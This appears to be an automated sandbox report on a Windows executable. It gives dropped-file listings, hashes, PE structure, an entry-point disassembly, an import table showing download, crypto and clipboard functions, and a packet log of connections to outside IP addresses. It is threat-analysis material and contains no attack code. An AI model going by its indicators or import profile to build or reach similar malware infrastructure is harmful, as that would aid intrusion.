Preview:	.........................................................................................=.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................-q.,..... .....B..u...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P..........K......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11261897416765826
Encrypted:	false
SSDEEP:	12:0Xm/Ey6q9995J2a771miM3qQ10nMCldimE8eawHza1miIHrT:9l68rL1tMLyMCldzE9BHza1tILT
MD5:	80A26EDFBE267A6F22527E51E0A5899F
SHA1:	55013E96CE8D82A837D10670F8C4EF12BECE3468
SHA-256:	4545B78EF9C54061F752AA486602015A8B5DF339B99D338F59211E9622D008FD
SHA-512:	5718F4797396AD1C7983B5820A2C610C765D4D1D197F6DDF239A148E358AA06992D3CDF6317A6222F578A6414D82E7F4C821073C54E60858CB07D3463681254E
Malicious:	false
Preview:	.................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................-q.,..... .....*..u...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........B......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11243659954820152
Encrypted:	false
SSDEEP:	12:2VXm/Ey6q9995J2gOk71mK2P3qQ10nMCldimE8eawHza1mKOxN:Hl68rRX1iPLyMCldzE9BHza1G
MD5:	79EC79E34DCE5A07A775BEB41C41069D
SHA1:	7D35916770231556163F80BBD3BE7E3A0CFD341E
SHA-256:	C1535A18DE5513DB3EDB4BFE7F902F0AA29D84078D53AEE5125B718047CD8D2B
SHA-512:	55AB7C03222FD9E9861B5A39FFBD284FA3F37B3B772C386467F8A14D18366853ECF08219DD2FC20FE3C25260AAEA45113A1189EA93E8D168D320ACF6C8F2FBE5
Malicious:	false
Preview:	.........................................................................................9.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................-q.,..... .........u...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.138829651394293
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3r87uDCk9+MlWlLehB4yAq7ejC17uDP:OaqdmuF3r5V+kWReH4yJ7MhP
MD5:	957381D50BC39FBE5C040D991E9C4508
SHA1:	FD7ED44382D289AC81D246AEA6DB1AA9C8216A08
SHA-256:	8F7AAF34632AEDF1434CD6E8AF4E2FA5A2BF512EA12EED7583D54F2A459F8179
SHA-512:	14D8FAC985B243F70B088F5D443C3ECA10C638712AFD446BC129E0187C88DD34A126C1FBCC1AF1009FFB0CA4411813DD24D966A2A7EB1110862F9C82338CECCB
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. M.o.n. .. J.a.n. .. 1.8. .. 2.0.2.1. .0.0.:.4.1.:.5.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. M.o.n. .. J.a.n. .. 1.8. .. 2.0.2.1. .0.0.:.4.1.:.5.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.880152269990318
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Br6Pmt0MiZ.exe
File size:	38400
MD5:	85c4f05bdc2c39858288c67d41db3e86
SHA1:	7ccf8a4822b6122a16d7252033da3536145715de
SHA256:	7c419f22e51f37be0c483bbf3c320c40b6939785896b756c504af5de5b46237f
SHA512:	d1d5f9eca0201701580a2a0afd703f00daf7502e979a6687de64319fd2327ca7a686c14c7b8bab8a8aab010d3a71e324e56bd1bd19b001b48a189601f3e0b757
SSDEEP:	768:V3B5h3B6rIePg+6eBJ/uQeF9PiPiPiPBn3zDn3zDn3zDn3zehohohohohohohohj:v5h3B6rIug+6ieF9PiPiPiPBn3zDn3zh
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$...Ez..Ez..Ez......Ez......Ez..E{..Ez..Z~..Ez.)Yt..Ez..Zp..Ez..=...Ez..=...Ez.Rich.Ez.................PE..L......_...........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40561a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FF3918C [Mon Jan 4 22:07:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	73ba2a1cf9a299161bb28d70a0472aab

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 004075B0h
push 004057A0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040610Ch]
pop ecx
or dword ptr [0040AAC8h], FFFFFFFFh
or dword ptr [0040AACCh], FFFFFFFFh
call dword ptr [00406110h]
mov ecx, dword ptr [0040AAC4h]
mov dword ptr [eax], ecx
call dword ptr [00406114h]
mov ecx, dword ptr [0040AAC0h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00406118h]
mov eax, dword ptr [eax]
mov dword ptr [0040AAD0h], eax
call 00007FDBF8BFAA35h
cmp dword ptr [0040A890h], ebx
jne 00007FDBF8BFA92Eh
push 00405796h
call dword ptr [0040611Ch]
pop ecx
call 00007FDBF8BFAA07h
push 0040900Ch
push 00409008h
call 00007FDBF8BFA9F2h
mov eax, dword ptr [0040AABCh]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0040AAB8h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00406124h]
push 00409004h
push 00409000h
call 00007FDBF8BFA9BFh

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[ C ] VS2005 build 50727
[LNK] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x75ec	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb000	0x1b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0x974	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6210	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6000	0x208	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x47b2	0x4800	False	0.401421440972	data	5.73597179586	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x6000	0x20d0	0x2200	False	0.531135110294	data	5.6046092473	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1ad4	0x1a00	False	0.0814302884615	data	2.97632921464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xb000	0x1b4	0x200	False	0.490234375	data	5.09797908882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xa72	0xc00	False	0.691731770833	data	5.99791692076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0xb058	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
MSVCRT.dll	_controlfp, memcpy, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, wcsstr, srand, wcslen, strchr, strcmp, fseek, ftell, _wfopen, fwprintf, fclose, mbstowcs, rand, memset, _mbsstr, strlen, isalpha, isdigit
WININET.dll	HttpQueryInfoA, InternetOpenA, InternetOpenUrlA, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle
urlmon.dll	URLDownloadToFileW
SHLWAPI.dll	StrCmpNW, PathMatchSpecW, PathFileExistsW, PathFindFileNameW, PathFileExistsA
KERNEL32.dll	SetFileAttributesW, CopyFileW, lstrcmpiW, CreateDirectoryW, FindFirstFileW, lstrcmpW, MoveFileExW, FindNextFileW, FindClose, GetVolumeInformationW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, lstrcpyW, ExpandEnvironmentStringsW, WriteFile, CreateFileW, GetFileSize, CreateFileMappingA, GetModuleFileNameW, CreateProcessW, GetLocaleInfoA, CreateThread, GetTickCount, GetLastError, CreateMutexA, ExitProcess, CopyFileA, DeleteFileA, MoveFileW, MoveFileA, GetModuleHandleA, RemoveDirectoryW, DeleteFileW, GlobalUnlock, GlobalLock, GlobalAlloc, ExitThread, Sleep, SetEndOfFile, SetFilePointer, CloseHandle, UnmapViewOfFile, HeapFree, HeapAlloc, GetProcessHeap, MapViewOfFile, GetStartupInfoA
USER32.dll	SetFocus, CloseWindow, SetForegroundWindow, ShowWindow, FindWindowA, wsprintfA, wsprintfW, GetClipboardData, OpenClipboard, EmptyClipboard, CloseClipboard, SetClipboardData
ADVAPI32.dll	CryptAcquireContextW, CryptEncrypt, CryptImportKey, CryptVerifySignatureA, CryptHashData, CryptCreateHash, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegSetValueExW, CryptDestroyKey
SHELL32.dll	ShellExecuteW
ole32.dll	CoInitializeEx, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 18, 2021 00:40:15.642622948 CET	49717	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:15.698494911 CET	80	49717	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:15.698751926 CET	49717	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:15.699996948 CET	49717	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:15.755703926 CET	80	49717	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:15.755747080 CET	80	49717	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:15.755867958 CET	49717	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:26.362732887 CET	49717	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:30.178997993 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:30.234810114 CET	80	49723	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:30.234958887 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:30.235579014 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:30.291114092 CET	80	49723	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:30.291161060 CET	80	49723	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:30.291245937 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:36.084122896 CET	49727	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:40:39.081945896 CET	49727	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:40:41.415569067 CET	49731	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:41.472104073 CET	80	49731	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:41.472239017 CET	49731	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:41.478290081 CET	49731	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:41.534048080 CET	80	49731	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:41.534116983 CET	80	49731	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:41.534224987 CET	49731	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:42.180600882 CET	49731	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:45.082436085 CET	49727	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:40:45.291738033 CET	80	49723	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:45.291821003 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:50.466676950 CET	49733	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:50.522422075 CET	80	49733	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:50.522537947 CET	49733	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:50.522984028 CET	49733	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:50.578708887 CET	80	49733	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:50.578757048 CET	80	49733	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:50.578843117 CET	49733	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:50.891231060 CET	49733	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:57.213071108 CET	49736	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:40:59.680602074 CET	49737	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:59.736272097 CET	80	49737	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:59.736372948 CET	49737	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:59.744499922 CET	49737	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:40:59.800904036 CET	80	49737	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:59.800940990 CET	80	49737	212.83.168.196	192.168.2.3
Jan 18, 2021 00:40:59.801032066 CET	49737	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:41:00.208683014 CET	49736	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:00.222306967 CET	49737	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:41:06.209163904 CET	49736	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:18.339961052 CET	49746	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:21.351083040 CET	49746	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:27.351772070 CET	49746	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:39.470949888 CET	49747	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:42.477910042 CET	49747	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:41:48.478488922 CET	49747	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:00.597163916 CET	49750	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:03.604604959 CET	49750	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:09.620744944 CET	49750	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:20.028671980 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:20.340498924 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:20.949851036 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:21.757150888 CET	49751	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:22.153122902 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:24.559509039 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:24.762651920 CET	49751	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:29.372489929 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:30.763159037 CET	49751	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:38.982753038 CET	49723	80	192.168.2.3	212.83.168.196
Jan 18, 2021 00:42:50.208652020 CET	49758	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:53.222099066 CET	49758	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:42:59.232229948 CET	49758	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:11.604727983 CET	49769	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:14.605915070 CET	49769	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:20.606631994 CET	49769	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:32.721117020 CET	49770	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:35.732767105 CET	49770	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:41.733285904 CET	49770	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:53.851135969 CET	49771	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:43:56.859591961 CET	49771	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:02.859910965 CET	49771	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:15.366024017 CET	49772	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:18.376878023 CET	49772	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:24.392983913 CET	49772	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:36.510849953 CET	49773	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:39.519340038 CET	49773	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:44:45.519694090 CET	49773	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:04.980463028 CET	49785	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.175146103 CET	80	49785	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.175237894 CET	49785	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.176337957 CET	49785	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.371016979 CET	80	49785	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.371062994 CET	80	49785	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.372164011 CET	49785	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.374102116 CET	49785	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.477963924 CET	49786	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.568670034 CET	80	49785	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.673214912 CET	80	49786	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.673413038 CET	49786	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.674190998 CET	49786	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.869220972 CET	80	49786	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.869261980 CET	80	49786	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:05.869770050 CET	49786	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.869812012 CET	49786	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:05.977008104 CET	49787	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.064884901 CET	80	49786	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.172555923 CET	80	49787	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.172940969 CET	49787	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.174163103 CET	49787	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.369343042 CET	80	49787	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.369405985 CET	80	49787	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.369901896 CET	49787	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.369961977 CET	49787	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.479374886 CET	49788	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.565223932 CET	80	49787	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.674999952 CET	80	49788	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.675348997 CET	49788	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.676374912 CET	49788	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.871820927 CET	80	49788	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.871949911 CET	80	49788	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:06.872227907 CET	49788	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.872407913 CET	49788	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:06.980199099 CET	49789	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.067641973 CET	80	49788	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:07.174962997 CET	80	49789	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:07.175321102 CET	49789	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.176433086 CET	49789	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.370882988 CET	80	49789	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:07.370929956 CET	80	49789	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:07.371241093 CET	49789	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.371383905 CET	49789	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.479635954 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.565814018 CET	80	49789	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:07.674233913 CET	80	49790	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:07.674448013 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:07.674876928 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:08.162224054 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:08.788866043 CET	80	49790	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:08.789191961 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:08.803083897 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:08.997622013 CET	80	49790	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:08.997708082 CET	80	49790	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:08.997942924 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:08.998136997 CET	49790	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:45:09.192642927 CET	80	49790	64.70.19.203	192.168.2.3
Jan 18, 2021 00:45:09.382989883 CET	49791	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:12.396935940 CET	49791	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:18.397645950 CET	49791	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:30.530391932 CET	49792	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:33.539515018 CET	49792	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:39.539853096 CET	49792	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:51.656888008 CET	49793	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:45:54.666064024 CET	49793	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:00.666743994 CET	49793	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:12.799555063 CET	49794	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:15.808624983 CET	49794	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:21.809179068 CET	49794	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:33.929737091 CET	49795	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:36.935266972 CET	49795	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:42.935842037 CET	49795	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:55.050164938 CET	49796	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:46:58.061991930 CET	49796	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:04.062634945 CET	49796	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:16.499193907 CET	49799	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:19.501115084 CET	49799	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:25.501754999 CET	49799	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:37.618948936 CET	49800	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:40.628046989 CET	49800	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:46.628808975 CET	49800	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:47:58.761245012 CET	49802	80	192.168.2.3	185.215.113.10
